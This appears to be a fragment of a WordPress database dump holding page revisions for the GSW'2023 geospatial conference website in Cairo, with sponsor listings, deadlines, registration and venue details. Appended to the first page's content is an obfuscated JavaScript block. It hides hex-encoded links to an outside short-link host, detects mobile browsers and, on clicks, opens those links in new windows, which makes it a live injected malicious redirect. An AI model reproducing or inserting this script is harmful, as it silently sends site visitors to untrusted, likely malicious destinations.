offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:39:55','2023-05-16 01:39:55','',3066,'https://gsw2023.com/?p=4485',0,'revision','',0),
(4486,1,'2023-05-16 01:40:47','2023-05-16 01:40:47','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201209429{margin-top: 1200px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 